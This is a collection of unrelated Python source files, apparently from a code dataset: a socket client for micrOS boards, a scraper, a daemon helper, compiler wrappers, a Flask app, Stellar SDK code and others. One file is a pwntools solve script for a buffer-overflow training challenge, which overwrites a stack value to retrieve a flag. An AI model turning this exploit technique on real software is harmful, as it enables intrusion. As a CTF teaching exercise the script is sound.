Columns: id — string (lengths 1–265); text — string (lengths 6–5.19M); dataset_id — string (7 classes)
178966
import socket
import select
import re
from Debug import errlog_add
from ConfigHandler import cfgget
from SocketServer import SocketServer


class InterCon:
    CONN_MAP = {}

    def __init__(self):
        self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.conn.settimeout(4)

    @staticmethod
    def validate_ipv4(str_in):
        pattern = (r"^([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\."
                   r"([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\."
                   r"([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\."
                   r"([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$")
        return bool(re.match(pattern, str_in))

    def send_cmd(self, host, port, cmd):
        hostname = None
        # Check if host is a hostname (example.local) and resolve its IP address
        if not InterCon.validate_ipv4(host):
            hostname = host
            # Retrieve IP address by hostname dynamically
            if InterCon.CONN_MAP.get(hostname, None) is None:
                host = socket.getaddrinfo(host, port)[-1][4][0]
            else:
                # Restore IP from cache by hostname
                host = InterCon.CONN_MAP[hostname]
        # If IP address is available, send msg to the endpoint
        if InterCon.validate_ipv4(host):
            SocketServer().reply_message("[intercon] {} -> {}:{}:{}".format(cmd, hostname, host, port))
            # Send command over TCP/IP
            self.conn.connect((host, port))
            try:
                output = self.__run_command(cmd, hostname)
            except Exception as e:
                errlog_add("[intercon] send_cmd error: {}".format(e))
                output = None
            self.conn.close()
            # Cache successful connection data (hostname:IP)
            if hostname is not None:
                # In case of valid communication store device ip, otherwise set ip to None
                InterCon.CONN_MAP[hostname] = None if output is None else host
            return output
        else:
            errlog_add("[intercon] Invalid host: {}".format(host))
        return None

    def __run_command(self, cmd, hostname):
        cmd = str.encode(cmd)
        data, prompt = self.__receive_data()
        # Compare prompt |node01 $| with hostname 'node01.local'
        if hostname is None or prompt is None or str(prompt).replace('$', '').strip() == str(hostname).split('.')[0]:
            # Run command on validated device
            self.conn.send(cmd)
            data, _ = self.__receive_data(prompt=prompt)
            if data == '\0':
                return None
            return data
        # Skip command run: prompt and host not the same!
        SocketServer().reply_message("[intercon] prompt mismatch, hostname: {} prompt: {} ".format(hostname, prompt))
        return None

    def __receive_data(self, prompt=None):
        data = ""
        # Collect answer data
        if select.select([self.conn], [], [], 1)[0]:
            while True:
                last_data = self.conn.recv(512).decode('utf-8').strip()
                # First data is prompt, get it
                prompt = last_data.strip() if prompt is None else prompt
                data += last_data
                # Wait for prompt or special cases (conf,exit)
                if prompt in data.strip() or '[configure]' in data or "Bye!" in last_data:
                    break
            data = data.replace(prompt, '')
            data = [k.strip() for k in data.split('\n')]
        return data, prompt


# Main command to send msg to other micrOS boards
def send_cmd(host, cmd):
    port = cfgget('socport')
    # Send command
    output = InterCon().send_cmd(host, port, cmd)
    # Retry once with a fresh object: the previous socket was already closed,
    # so reconnecting on the same InterCon instance would always fail
    if output is None:
        output = InterCon().send_cmd(host, port, cmd)
    return output


# Dump connection cache
def dump_cache():
    return InterCon.CONN_MAP
StarcoderdataPython
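A hedged usage sketch for the intercon helpers above, as they might be called from another micrOS board. The module name, host name, and command below are illustrative assumptions, not part of the record:

# Hypothetical call site; 'InterConnect' module name, 'node01.local' and
# the 'system clock' command are placeholders for illustration.
from InterConnect import send_cmd, dump_cache

reply = send_cmd('node01.local', 'system clock')
print(reply)          # list of reply lines, or None on failure
print(dump_cache())   # hostname -> cached IP map, e.g. {'node01.local': '192.168.1.50'}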
3370939
<filename>mla/utils/__init__.py<gh_stars>1000+
# coding:utf-8
from .main import *
StarcoderdataPython
1773510
<filename>src/data/scraping/scrape_match_search_pages.py<gh_stars>0
from bs4 import BeautifulSoup as bs
from os import listdir
import codecs
import pandas as pd
import re

path = "../../../data/external/search_pages/"
search_pages = []
dfs = []


def get_match_component_ids(soup, search_string):
    links = soup.find_all(lambda tag: tag.name == "a" and search_string in tag.text)
    urls = [a['href'] for a in links]
    ids = [url.strip(".html").split('/')[-1] for url in urls]
    return ids


for fn in listdir(path):
    print(f"Processing page {fn.strip('html').split('=')[-1]}", flush=True)
    filepath = path + fn
    html = codecs.open(filepath, 'r').read()
    soup = bs(html, 'html.parser')
    table_df = pd.read_html(str(soup.find_all("table", class_="engineTable")[1]))[0]
    table_df['Opposition'] = table_df['Opposition'].apply(lambda opp: opp[2:])
    table_df.drop('Unnamed: 14', axis=1, inplace=True)
    table_df = table_df.assign(Team1Id=get_match_component_ids(soup, "Team home page"),
                               Team2Id=get_match_component_ids(soup, "Opposition home page"),
                               MatchId=get_match_component_ids(soup, "Match details"),
                               PitchId=get_match_component_ids(soup, "Ground profile"))
    dfs.append(table_df)

search_df = pd.concat(dfs, ignore_index=True, sort=False)
search_df.to_csv("../../../data/external/" + 'raw_all_match_search_pages.csv')
StarcoderdataPython
3239953
<reponame>wrwrwr/turtle-trans
"""
Some common utilities.
"""
from turtle import Turtle


def turtle_subclass(name):
    """
    Creates a subclass of Turtle with the given name.
    """
    return type(name, (Turtle,), {})


def translate_methods(cls, translations):
    """
    Creates aliases for method names.
    """
    for method, aliases in translations.items():
        func = getattr(cls, method)
        for alias in aliases:
            setattr(cls, alias, func)
StarcoderdataPython
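A minimal usage sketch for the two helpers above. The Spanish alias names are made up for illustration and are not part of the module:

# Hypothetical usage of turtle_subclass/translate_methods.
Tortuga = turtle_subclass("Tortuga")
translate_methods(Tortuga, {
    "forward": ["avanza", "adelante"],  # Tortuga().avanza(100) would now work
    "left": ["izquierda"],
})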
1720314
<filename>buffer_overflow_1/example_solve.py
#!/usr/bin/env python
import pwn
import sys

REMOTE_ADDR = "127.0.0.1"
REMOTE_PORT = "1337"


def get_challenge():
    if pwn.args.REMOTE:
        return pwn.remote(REMOTE_ADDR, REMOTE_PORT)
    else:
        return pwn.process("./chal")


# leak the offset of the overwritten value with a cyclic pattern
chal = get_challenge()
chal.sendline(pwn.cyclic(0x100))
chal.recvlines(2)
target_leak = chal.recvline()
padding_len = pwn.cyclic_find(int(target_leak.strip().split()[-1]))
chal.close()

# perform the actual exploit
chal = get_challenge()
chal.sendline(b"A" * padding_len + pwn.p32(42))
chal.recvlines(2)
flag = chal.recvline().strip().split()[-1].decode()
chal.close()

print(f"Found the flag: {flag}")
StarcoderdataPython
4823633
import os, sys, atexit, signal, time, errno, psutil

from .config import config


def _daemonize():
    try:
        pid = os.fork()
        if pid > 0:
            # exit first parent
            sys.exit(0)
    except OSError as e:
        sys.stderr.write('fork #1 failed: {} ({})\n'.format(e.errno, e.strerror))
        sys.exit(1)

    # decouple from parent environment
    os.chdir('/')
    os.setsid()
    os.umask(0)

    # do second fork
    try:
        pid = os.fork()
        if pid > 0:
            # exit from second parent
            sys.exit(0)
    except OSError as e:
        sys.stderr.write('fork #2 failed: {} ({})\n'.format(e.errno, e.strerror))
        sys.exit(1)

    # redirect standard file descriptors
    sys.stdout.flush()
    sys.stderr.flush()
    si = open('/dev/null', 'r')
    so = open('/dev/null', 'a+')
    se = open('/dev/null', 'a+')
    os.dup2(si.fileno(), sys.stdin.fileno())
    os.dup2(so.fileno(), sys.stdout.fileno())
    os.dup2(se.fileno(), sys.stderr.fileno())

    # write pidfile
    atexit.register(_deletePID)
    pid = str(os.getpid())
    open(getPIDFile(), 'w+').write('{}\n'.format(pid))


def _deletePID():
    os.remove(getPIDFile())


def _isSameProcessName(pid):
    p1 = psutil.Process()
    p2 = psutil.Process(pid)
    if p1.name() == p2.name():
        return True
    if p1.cmdline()[1] == p2.cmdline()[1]:
        return True
    if os.path.basename(p1.cmdline()[1]) == os.path.basename(p2.cmdline()[1]):
        return True
    return False


def start(main):
    pid = getDaemonPID()
    if pid:
        try:
            os.kill(pid, 0)
            # process with pid is running, check if it's ours
            if _isSameProcessName(pid):
                sys.stderr.write('pidfile {} already exists\n'.format(getPIDFile()))
                sys.exit(1)
            else:
                sys.stderr.write('pidfile {} already exists but specified process is not ours\n'.format(getPIDFile()))
        except OSError as err:
            if err.errno == errno.ESRCH:
                # no such process
                sys.stderr.write('pidfile {} already exists but no running process was found\n'.format(getPIDFile()))
            else:
                print(err)
                sys.exit(1)

    # Start the daemon
    _daemonize()
    main()


def stop():
    pid = getDaemonPID()
    if not pid:
        sys.stderr.write('pidfile {} does not exist\n'.format(getPIDFile()))
        return  # not an error in a restart

    try:
        os.kill(pid, 0)
        # process with pid is running, check if it's ours
        if _isSameProcessName(pid):
            try:
                while 1:
                    os.kill(pid, signal.SIGTERM)
                    time.sleep(0.1)
            except OSError as err:
                if err.errno == errno.ESRCH:
                    # no such process, must have exited
                    if os.path.exists(getPIDFile()):
                        os.remove(getPIDFile())
                else:
                    print(err)
                    sys.exit(1)
        else:
            sys.stderr.write('pidfile {} exists but specified process is not ours\n'.format(getPIDFile()))
            os.remove(getPIDFile())
            sys.exit(1)
    except OSError as err:
        if err.errno == errno.ESRCH:
            # no such process
            sys.stderr.write('pidfile {} exists but specified process is not running\n'.format(getPIDFile()))
            os.remove(getPIDFile())
        else:
            print(err)
            sys.exit(1)


def restart(main):
    stop()
    start(main)


def status():
    pid = getDaemonPID()
    if pid:
        try:
            os.kill(pid, 0)
            # process with pid is running, check if it's ours
            if _isSameProcessName(pid):
                sys.stdout.write('Daemon is running with PID {}.\n'.format(pid))
            else:
                sys.stderr.write('pidfile {} exists but specified process is not ours\n'.format(getPIDFile()))
                sys.exit(1)
        except OSError as err:
            if err.errno == errno.ESRCH:
                # no such process
                sys.stderr.write('pidfile {} exists but specified process is not running\n'.format(getPIDFile()))
            else:
                print(err)
                sys.exit(1)
    else:
        sys.stdout.write('Daemon is not running.\n')


def getDaemonPID():
    try:
        pf = open(getPIDFile(), 'r')
        pid = pf.read().strip()
        pid = int(pid) if pid else None
        pf.close()
    except IOError:
        pid = None
    return pid


def getPIDFile():
    return config.getpath('server', 'pidFile')
StarcoderdataPython
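A hedged sketch of how the daemon helpers above might be wired into a CLI entry point. It assumes the module is importable as 'daemon' (it actually uses a relative import for its config) and the main() loop is a placeholder:

# Hypothetical CLI wiring for start/stop/restart/status.
import sys
import time

import daemon  # assumption: the module above, importable under this name


def main():
    # placeholder work loop; a real daemon would do its work here
    while True:
        time.sleep(1)


if __name__ == '__main__':
    if sys.argv[1] == 'start':
        daemon.start(main)
    elif sys.argv[1] == 'stop':
        daemon.stop()
    elif sys.argv[1] == 'restart':
        daemon.restart(main)
    elif sys.argv[1] == 'status':
        daemon.status()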
3227789
<reponame>grnydawn/errand
"""Errand compiler module

"""

import os, sys, abc, re

from errand.util import which, shellcmd


class Compiler(abc.ABC):
    """Parent class for all compiler classes
    """

    def __init__(self, path, flags):
        self.path = path
        self.flags = flags
        self.version = None

    def isavail(self):
        if self.version is None:
            self.set_version(self.get_version())
        return (self.path is not None and os.path.isfile(self.path) and
                self.version is not None)

    def set_version(self, version):
        if version and self.check_version(version):
            self.version = version

    @abc.abstractmethod
    def get_option(self, **kwargs):
        linker = kwargs.pop("linker", True)
        opt = " ".join(self.flags) if self.flags else ""
        if linker is False:
            opt += " -c "
        return opt

    def get_version(self):
        ver = shellcmd("%s --version" % self.path).stdout.decode()
        return ver.strip() if ver else None

    @abc.abstractmethod
    def check_version(self, version):
        return False


class Cpp_Compiler(Compiler):

    def __init__(self, path, flags):
        super(Cpp_Compiler, self).__init__(path, flags)


class Fortran_Compiler(Compiler):

    def __init__(self, path, flags):
        super(Fortran_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        opt = " "
        moddir = kwargs.pop("moddir", None)
        if moddir:
            opt = "-J %s " % moddir
        return opt + super(Fortran_Compiler, self).get_option(**kwargs)


class AppleClang_Cpp_Compiler(Cpp_Compiler):

    libext = "dylib"

    def __init__(self, path, flags):
        if path is None:
            path = which("clang++")
        super(AppleClang_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return "-dynamiclib -fPIC " + super(AppleClang_Cpp_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("Apple clang version")


class Gnu_Cpp_Compiler(Cpp_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("g++")
        super(Gnu_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return "-shared -fPIC " + super(Gnu_Cpp_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("g++ (GCC)")


class AmdClang_Cpp_Compiler(Cpp_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("clang")
        super(AmdClang_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return "-shared " + super(AmdClang_Cpp_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("clang version") and "roc" in version


class Pgi_Cpp_Compiler(Cpp_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("pgc++")
        super(Pgi_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return "-shared " + super(Pgi_Cpp_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("pgc++") and "PGI" in version


class CrayClang_Cpp_Compiler(Cpp_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("CC")
        if path is None:
            path = which("clang++")
        if path is None:
            path = which("crayCC")
        super(CrayClang_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return "-shared " + super(CrayClang_Cpp_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("Cray clang version")


class IbmXl_Cpp_Compiler(Cpp_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("xlc++")
        super(IbmXl_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return "-shared " + super(IbmXl_Cpp_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("IBM XL C/C++")


class Pthread_Gnu_Cpp_Compiler(Gnu_Cpp_Compiler):

    def get_option(self, **kwargs):
        return "-pthread " + super(Pthread_Gnu_Cpp_Compiler, self).get_option(**kwargs)


class Pthread_CrayClang_Cpp_Compiler(CrayClang_Cpp_Compiler):

    def get_option(self, **kwargs):
        return "-pthread " + super(Pthread_CrayClang_Cpp_Compiler, self).get_option(**kwargs)


class Pthread_AmdClang_Cpp_Compiler(AmdClang_Cpp_Compiler):

    def get_option(self, **kwargs):
        return "-pthread " + super(Pthread_AmdClang_Cpp_Compiler, self).get_option(**kwargs)


class Pthread_Pgi_Cpp_Compiler(Pgi_Cpp_Compiler):

    def get_option(self, **kwargs):
        return "-lpthread " + super(Pthread_Pgi_Cpp_Compiler, self).get_option(**kwargs)


class Pthread_AppleClang_Cpp_Compiler(AppleClang_Cpp_Compiler):

    def get_option(self, **kwargs):
        return "-lpthread " + super(Pthread_AppleClang_Cpp_Compiler, self).get_option(**kwargs)


class OpenAcc_Gnu_Cpp_Compiler(Pthread_Gnu_Cpp_Compiler):

    def __init__(self, path, flags):
        super(OpenAcc_Gnu_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return ("-fopenacc " +
                super(OpenAcc_Gnu_Cpp_Compiler, self).get_option(**kwargs))

    def check_version(self, version):
        pat = re.compile(r"(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)")
        match = pat.search(version)
        if not match:
            return False
        return int(match.group("major")) >= 10


class OpenAcc_CrayClang_Cpp_Compiler(Pthread_CrayClang_Cpp_Compiler):

    def __init__(self, path, flags):
        super(OpenAcc_CrayClang_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return ("-h pragma=acc " +
                super(OpenAcc_CrayClang_Cpp_Compiler, self).get_option(**kwargs))


class OpenAcc_Pgi_Cpp_Compiler(Pthread_Pgi_Cpp_Compiler):

    def __init__(self, path, flags):
        super(OpenAcc_Pgi_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return ("-acc " + super(OpenAcc_Pgi_Cpp_Compiler, self).get_option(**kwargs))


class Cuda_Cpp_Compiler(Cpp_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("nvcc")
        super(Cuda_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return ("--compiler-options '-fPIC' --shared " +
                super(Cuda_Cpp_Compiler, self).get_option(**kwargs))

    def check_version(self, version):
        return version.startswith("nvcc: NVIDIA")


class Hip_Cpp_Compiler(Cpp_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("hipcc")
        super(Hip_Cpp_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        return ("-fPIC --shared " +
                super(Hip_Cpp_Compiler, self).get_option(**kwargs))

    def check_version(self, version):
        return version.startswith("HIP version")


class Gnu_Fortran_Compiler(Fortran_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("gfortran")
        super(Gnu_Fortran_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        opt = " "
        return "-shared -fPIC " + opt + super(Gnu_Fortran_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("GNU Fortran")


class AmdFlang_Fortran_Compiler(Fortran_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("flang")
        super(AmdFlang_Fortran_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        opt = " "
        return "-shared " + opt + super(AmdFlang_Fortran_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("flang-new version") and "roc" in version


class Cray_Fortran_Compiler(Fortran_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("ftn")
        if path is None:
            path = which("crayftn")
        super(Cray_Fortran_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        opt = " "
        return "-shared " + opt + super(Cray_Fortran_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("Cray Fortran")


class AppleGnu_Fortran_Compiler(Gnu_Fortran_Compiler):

    libext = "dylib"

    def check_version(self, version):
        return sys.platform == "darwin" and super(AppleGnu_Fortran_Compiler, self).check_version(version)


class IbmXl_Fortran_Compiler(Fortran_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("xlf2008_r")
        if path is None:
            path = which("xlf2008")
        if path is None:
            path = which("xlf2003_r")
        if path is None:
            path = which("xlf2003")
        if path is None:
            path = which("xlf95_r")
        if path is None:
            path = which("xlf95")
        if path is None:
            path = which("xlf90_r")
        if path is None:
            path = which("xlf90")
        super(IbmXl_Fortran_Compiler, self).__init__(path, flags)

    def get_version(self):
        ver = shellcmd("%s -qversion" % self.path).stdout.decode()
        return ver.strip() if ver else None

    def get_option(self, **kwargs):
        opt = " "
        moddir = kwargs.pop("moddir", None)
        if moddir:
            opt = "-qmoddir=%s " % moddir
        return "-qmkshrobj " + opt + super(IbmXl_Fortran_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("IBM XL Fortran")


class Pgi_Fortran_Compiler(Fortran_Compiler):

    def __init__(self, path, flags):
        if path is None:
            path = which("pgfortran")
        super(Pgi_Fortran_Compiler, self).__init__(path, flags)

    def get_option(self, **kwargs):
        opt = " "
        moddir = kwargs.pop("moddir", None)
        if moddir:
            opt = "-module %s " % moddir
        return "-shared -fpic " + opt + super(Pgi_Fortran_Compiler, self).get_option(**kwargs)

    def check_version(self, version):
        return version.startswith("pgfortran") and "PGI" in version


class Compilers(object):

    def __init__(self, backend, compile):
        self.clist = []
        clist = []

        if backend in ("pthread", "c++"):
            clist = [Pthread_Gnu_Cpp_Compiler, Pthread_CrayClang_Cpp_Compiler,
                     Pthread_AmdClang_Cpp_Compiler, Pthread_Pgi_Cpp_Compiler,
                     Pthread_AppleClang_Cpp_Compiler]
        elif backend == "cuda":
            clist = [Cuda_Cpp_Compiler]
        elif backend == "hip":
            clist = [Hip_Cpp_Compiler]
        elif backend == "openacc-c++":
            clist = [OpenAcc_Gnu_Cpp_Compiler, OpenAcc_CrayClang_Cpp_Compiler,
                     OpenAcc_Pgi_Cpp_Compiler]
        elif backend == "fortran":
            clist = [AmdFlang_Fortran_Compiler, Cray_Fortran_Compiler,
                     Pgi_Fortran_Compiler, IbmXl_Fortran_Compiler,
                     AppleGnu_Fortran_Compiler, Gnu_Fortran_Compiler]
        else:
            raise Exception("Compiler for '%s' is not supported." % backend)

        for cls in clist:
            try:
                if compile:
                    path = which(compile[0])
                    if path:
                        self.clist.append(cls(path, compile[1:]))
                else:
                    self.clist.append(cls(None, None))
            except Exception:
                pass

    def isavail(self):
        return self.select_one() is not None

    def select_one(self):
        for comp in self.clist:
            if comp.isavail():
                return comp

    def select_many(self):
        return [comp for comp in self.clist if comp.isavail()]
StarcoderdataPython
91211
<reponame>naritapandhe/Microsoft-Malware-Classification-Challenge
from pyspark.sql import SparkSession
from pyspark.mllib.linalg import SparseVector, VectorUDT, Vectors
from pyspark.sql.types import *
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.evaluation import MulticlassClassificationEvaluator

# initialize spark session
spark = SparkSession\
    .builder\
    .appName("Test")\
    .config('spark.sql.warehouse.dir', 'file:///C:/')\
    .getOrCreate()
sc = spark.sparkContext

# load data
train = spark.read.load("./data/train_small.parquet")
test = spark.read.load("./data/test_small.parquet")

# rf classifier
rf = RandomForestClassifier(numTrees=100, maxDepth=8, seed=42)
model = rf.fit(train)
result = model.transform(test)
result.show()

# get accuracy
predictionAndLabels = result.select("prediction", "label")
evaluator = MulticlassClassificationEvaluator(metricName="accuracy")
print("Accuracy: " + str(evaluator.evaluate(predictionAndLabels)))
StarcoderdataPython
109645
<reponame>febiponwin/Swift_mobile_Verification
from flask import Flask, render_template, request
import sqlite3 as sql
import operation
import image_mail

app = Flask(__name__)


@app.route('/')
def home():
    return render_template('home.html')


@app.route('/enternew')
def new_student():
    return render_template('user.html')


@app.route('/addrec', methods=['POST', 'GET'])
def addrec():
    if request.method == 'POST':
        try:
            opt = operation.operation()
            cws = request.form['cws']
            phone_no = request.form['phone_no']
            phone_model = request.form['phone_model']
            created_time, ids = opt.calculate_code(cws, phone_no, phone_model)
            with sql.connect("database.db") as con:
                cur = con.cursor()
                cur.execute("INSERT INTO user_info (cws_id,phone_no,phone_model,created_time,id,updated_time) VALUES (?,?,?,?,?,?)",
                            (cws, phone_no, phone_model, created_time, ids, created_time))
                con.commit()
                msg = "Record successfully added"
                if opt.qr_code_png(ids, cws):
                    msg = msg + " and QR code has been generated"
                print("Sending mail to the user")
                # mailer.Mailer().send("<EMAIL>")
                # imageMailer.Mailer().messageBody("cws")
                image_mail.Mailer().send_message(cws)
        except:
            con.rollback()
            msg = "error in insert operation"
        finally:
            con.close()
            return render_template("result.html", msg=msg)


@app.route('/validate_user')
def validate_user():
    return render_template('validate.html')


@app.route('/update_user')
def update_user():
    return render_template('update.html')


@app.route('/list')
def list():
    con = sql.connect("database.db")
    con.row_factory = sql.Row
    cur = con.cursor()
    cur.execute("select * from user_info")
    rows = cur.fetchall()
    return render_template("list.html", rows=rows)


@app.route('/validate', methods=['POST', 'GET'])
def validate():
    if request.method == 'POST':
        ids = request.form['ids']
        con = sql.connect("database.db")
        con.row_factory = sql.Row
        cur = con.cursor()
        cur.execute("select * from user_info where id = (?)", (ids,))
        rows = cur.fetchall()
        return render_template("validate_result.html", rows=rows)


@app.route('/search', methods=['POST', 'GET'])
def search():
    if request.method == 'POST':
        cws = request.form['cws']
        con = sql.connect("database.db")
        con.row_factory = sql.Row
        cur = con.cursor()
        cur.execute("select * from user_info where cws_id = (?)", (cws,))
        rows = cur.fetchall()
        return render_template("search_result.html", rows=rows)


@app.route('/update', methods=['POST', 'GET'])
def update():
    if request.method == 'POST':
        try:
            opt = operation.operation()
            cws = request.form['cws']
            phone_no = request.form['phone_no']
            phone_model = request.form['phone_model']
            created_time, ids = opt.calculate_code(cws, phone_no, phone_model)
            with sql.connect("database.db") as con:
                cur = con.cursor()
                cur.execute("UPDATE user_info SET phone_no = ?,phone_model = ?,id = ?, updated_time = ? where cws_id = ? ",
                            (phone_no, phone_model, ids, created_time, cws))
                con.commit()
                msg = "Record successfully updated"
                if opt.qr_code_png(ids, cws):
                    msg = msg + " and QR code has been generated"
                print("Sending mail to the user")
                image_mail.Mailer().send_message(cws)
        except Exception as err:
            con.rollback()
            msg = "error in update operation " + str(err)
        finally:
            con.close()
            return render_template("result.html", msg=msg)


if __name__ == '__main__':
    app.run(port=8080, debug=True)
StarcoderdataPython
1789236
<gh_stars>0
class Signal:
    def __init__(self) -> None:
        self._slots = []

    def connect(self, slot):
        self._slots.append(slot)

    def remove_slot(self, slot):
        self._slots.remove(slot)

    def emit(self, *args, **kwargs):
        for slot in self._slots:
            slot(*args, **kwargs)
StarcoderdataPython
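A minimal usage sketch for the Signal class above; the handler name and payload are illustrative only:

# Hypothetical wiring of the Signal class.
def on_saved(path, ok=True):
    print(f"saved {path}: {ok}")

saved = Signal()
saved.connect(on_saved)
saved.emit("/tmp/out.txt", ok=True)   # -> "saved /tmp/out.txt: True"
saved.remove_slot(on_saved)           # handler no longer called on emit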
1628039
<filename>stellar_sdk/base_transaction_envelope.py
from abc import abstractmethod
from typing import Generic, List, TypeVar, Union

from . import xdr as stellar_xdr
from .decorated_signature import DecoratedSignature
from .exceptions import SignatureExistError
from .keypair import Keypair
from .network import Network
from .type_checked import type_checked
from .utils import hex_to_bytes, sha256

T = TypeVar("T")


@type_checked
class BaseTransactionEnvelope(Generic[T]):
    def __init__(
        self,
        network_passphrase: str,
        signatures: List[DecoratedSignature] = None,
    ) -> None:
        self.network_passphrase: str = network_passphrase
        self.signatures: List[DecoratedSignature] = signatures or []
        self._network_id: bytes = Network(network_passphrase).network_id()

    def hash(self) -> bytes:
        """Get the XDR Hash of the signature base.

        This hash is ultimately what is signed before transactions are sent
        over the network. See :meth:`signature_base` for more details about
        this process.

        :return: The XDR Hash of this transaction envelope's signature base.
        """
        return sha256(self.signature_base())

    def hash_hex(self) -> str:
        """Return a hex encoded hash for this transaction envelope.

        :return: A hex encoded hash for this transaction envelope.
        """
        return self.hash().hex()

    def sign(self, signer: Union[Keypair, str]) -> None:
        """Sign this transaction envelope with a given keypair.

        Note that the signature must not already be in this instance's list of
        signatures.

        :param signer: The keypair or secret to use for signing this
            transaction envelope.
        :raise: :exc:`SignatureExistError <stellar_sdk.exception.SignatureExistError>`:
            if this signature already exists.
        """
        if isinstance(signer, str):
            signer = Keypair.from_secret(signer)
        tx_hash = self.hash()
        sig = signer.sign_decorated(tx_hash)
        if sig in self.signatures:
            raise SignatureExistError("The keypair has already signed.")
        else:
            self.signatures.append(sig)

    @abstractmethod
    def signature_base(self) -> bytes:
        """Get the signature base of this transaction envelope.

        Return the "signature base" of this transaction, which is the value
        that, when hashed, should be signed to create a signature that
        validators on the Stellar Network will accept.

        It is composed of a 4 prefix bytes followed by the xdr-encoded form of
        this transaction.

        :return: The signature base of this transaction envelope.
        """
        raise NotImplementedError("The method has not been implemented.")

    def sign_hashx(self, preimage: Union[bytes, str]) -> None:
        """Sign this transaction envelope with a Hash(x) signature.

        See Stellar's documentation on `Multi-Sig
        <https://developers.stellar.org/docs/glossary/multisig/>`_ for more
        details on Hash(x) signatures.

        :param preimage: Preimage of hash used as signer, byte hash or hex
            encoded string
        """
        preimage_bytes: bytes = hex_to_bytes(preimage)
        hash_preimage = sha256(preimage_bytes)
        hint = hash_preimage[-4:]
        sig = DecoratedSignature(hint, preimage_bytes)
        if sig in self.signatures:
            raise SignatureExistError("The preimage has already signed.")
        else:
            self.signatures.append(sig)

    def to_xdr_object(self) -> stellar_xdr.TransactionEnvelope:
        """Get an XDR object representation of this
        :class:`BaseTransactionEnvelope`.

        :return: XDR TransactionEnvelope object
        """
        raise NotImplementedError("The method has not been implemented.")

    def to_xdr(self) -> str:
        """Get the base64 encoded XDR string representing this
        :class:`BaseTransactionEnvelope`.

        :return: XDR TransactionEnvelope base64 string object
        """
        return self.to_xdr_object().to_xdr()

    @classmethod
    def from_xdr_object(
        cls, xdr_object: stellar_xdr.TransactionEnvelope, network_passphrase: str
    ) -> T:
        """Create a new :class:`BaseTransactionEnvelope` from an XDR object.

        :param xdr_object: The XDR object that represents a transaction
            envelope.
        :param network_passphrase: The network to connect to for verifying and
            retrieving additional attributes from.
        :return: A new :class:`TransactionEnvelope` object from the given XDR
            TransactionEnvelope object.
        """
        raise NotImplementedError("The method has not been implemented.")

    @classmethod
    def from_xdr(cls, xdr: str, network_passphrase: str) -> T:
        """Create a new :class:`BaseTransactionEnvelope` from an XDR string.

        :param xdr: The XDR string that represents a transaction envelope.
        :param network_passphrase: which network this transaction envelope is
            associated with.
        :return: A new :class:`BaseTransactionEnvelope` object from the given
            XDR TransactionEnvelope base64 string object.
        """
        xdr_object = stellar_xdr.TransactionEnvelope.from_xdr(xdr)
        return cls.from_xdr_object(xdr_object, network_passphrase)

    @abstractmethod
    def __eq__(self, other: object) -> bool:
        pass  # pragma: no cover

    def __str__(self):
        return (
            f"<BaseTransactionEnvelope [network_passphrase={self.network_passphrase}, "
            f"signatures={self.signatures}]>"
        )
StarcoderdataPython
3367242
<reponame>pcaston/core
"""Errors for the Hue component."""
from openpeerpower.exceptions import OpenPeerPowerError


class HueException(OpenPeerPowerError):
    """Base class for Hue exceptions."""


class CannotConnect(HueException):
    """Unable to connect to the bridge."""


class AuthenticationRequired(HueException):
    """Unknown error occurred."""
StarcoderdataPython
3372617
#
# Copyright 2020 <NAME>
#           2020 <NAME>
#
# ### MIT license
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
